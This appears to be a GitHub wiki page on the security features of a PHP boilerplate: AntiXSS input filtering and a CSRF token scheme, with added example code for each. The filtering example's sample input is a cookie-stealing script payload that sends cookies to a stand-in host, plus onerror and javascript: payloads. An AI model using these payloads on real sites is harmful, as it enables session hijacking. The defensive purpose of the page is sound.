Security
schnoog edited this page Dec 29, 2017 · 1 revision
This boilerplate includes the voku "AntiXSS" library (voku/anti-xss).
The class instance is created while the app is bootstrapped (including the AJAX backend), so it is available everywhere.
Any string can be filtered with it by calling
$safeString = $antiXss->xss_clean($harmful);
Note that xss_clean() filters known attack patterns out of the input; a value that is later echoed into HTML should still be escaped for its output context (for example with htmlspecialchars()).
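The call above in context, as an added example that is not part of the wiki or the boilerplate. It assumes the library is installed through Composer and that vendor/autoload.php is on the include path; the sample input is constructed. The wiki mentions only xss_clean(); isXssFound() is another method of the same library and reports whether the last call actually removed something.

```php
<?php
// Added example, not code from the boilerplate. Assumes voku/anti-xss is
// installed via Composer (composer require voku/anti-xss).
require_once __DIR__ . '/vendor/autoload.php';

use voku\helper\AntiXSS;

// Constructed sample input, as a user might submit it in a comment field.
$harmful = 'Hello <script>document.location="http://evil.example/?c="+document.cookie</script>'
         . ' <img src="x" onerror="alert(1)"> <a href="javascript:alert(2)">link</a>';

$antiXss = new AntiXSS();

// xss_clean() strips or neutralises the dangerous parts of the string and
// returns the cleaned copy; the original variable is left untouched.
$safeString = $antiXss->xss_clean($harmful);

// isXssFound() tells you whether the last xss_clean() call removed anything.
// That is worth logging: a legitimate user rarely submits <script> tags.
if ($antiXss->isXssFound()) {
    error_log('XSS pattern removed from user input');
}

// The filter reduces the attack surface, but it is not output encoding.
// When the value is echoed into HTML, still escape it for that context.
echo htmlspecialchars($safeString, ENT_QUOTES | ENT_HTML5, 'UTF-8');
```

Filtering on input and encoding on output are separate controls; the filter catches payloads that the application would otherwise store, the encoding makes sure that whatever is stored cannot change the structure of the page it ends up in.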
To prevent CSRF, a "token" field is attached to each form automatically.
The token carries the user's group mask, which allows fine-grained permission checks in the backend, and the user id.
Tampering with these values is detected by a salted MD5 hash over them. (A salted hash is not a keyed MAC; for new code, hash_hmac() with a server-side secret and hash_equals() for the comparison is the usual choice.)
In addition, the token is written into each page-specific JavaScript file so that it can be sent easily with AJAX requests.
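The token scheme described above, as an added example that is neither the wiki's nor the boilerplate's code. It binds the user id and group mask into the token as the wiki describes, but uses hash_hmac() with a server-side secret in place of a salted MD5 and hash_equals() for the comparison; the function names csrf_token_make() and csrf_token_check(), the CSRF_SECRET constant and the session binding are assumptions for illustration, and the sample user and session values are constructed.

```php
<?php
// Added example, not the boilerplate's code. csrf_token_make(),
// csrf_token_check(), CSRF_SECRET and the session binding are assumptions
// for illustration; hash_hmac() replaces the wiki's salted MD5.

// Server-side secret, loaded from config in a real app; never sent to the client.
const CSRF_SECRET = 'replace-with-a-long-random-secret-from-config';

function csrf_token_make(int $userId, int $groupMask, string $sessionId): string
{
    // The payload carries what the backend needs for fine-grained checks.
    $payload = $userId . ':' . $groupMask . ':' . $sessionId;
    // Keyed MAC over the payload: changing the user id or group mask
    // invalidates the tag, and forging a new tag requires the secret.
    $tag = hash_hmac('sha256', $payload, CSRF_SECRET);
    return base64_encode($payload . '|' . $tag);
}

function csrf_token_check(string $token, string $sessionId): ?array
{
    $decoded = base64_decode($token, true);
    if ($decoded === false || strpos($decoded, '|') === false) {
        return null;
    }
    [$payload, $tag] = explode('|', $decoded, 2);
    $expected = hash_hmac('sha256', $payload, CSRF_SECRET);
    // Constant-time comparison so the tag cannot be guessed byte by byte.
    if (!hash_equals($expected, $tag)) {
        return null;
    }
    $parts = explode(':', $payload, 3);
    if (count($parts) !== 3) {
        return null;
    }
    [$userId, $groupMask, $boundSession] = $parts;
    // Bind the token to the current session: a token captured from one
    // session is rejected in any other.
    if (!hash_equals($boundSession, $sessionId)) {
        return null;
    }
    return ['user_id' => (int) $userId, 'group_mask' => (int) $groupMask];
}

// Constructed sample: user 42 with group mask 0b0101 in a fixed session.
$sessionId = 'sess-abc123';
$token = csrf_token_make(42, 5, $sessionId);

// Attached to every form as a hidden field ...
$hidden = '<input type="hidden" name="token" value="'
        . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '">';

// ... and exposed to the page's JavaScript for AJAX requests.
$js = 'var csrfToken = ' . json_encode($token) . ';';

// Backend check on a form POST or AJAX request (falls back to the sample
// token so the script runs stand-alone).
$result = csrf_token_check($_POST['token'] ?? $token, $sessionId);
if ($result === null) {
    http_response_code(403);
    exit('invalid CSRF token');
}
// $result['group_mask'] can now drive the permission check in the backend.

// Raising the group mask inside the token without the secret is detected:
// the tag no longer matches the payload and the check returns null.
[$payload, $tag] = explode('|', base64_decode($token), 2);
$forged = base64_encode('42:15:' . $sessionId . '|' . $tag);
var_dump(csrf_token_check($forged, $sessionId));
```

The session binding is what turns a tamper-proof token into a CSRF defence: without it, an attacker who has any valid token (their own, for instance) could embed it in a cross-site form, since the tag would still verify.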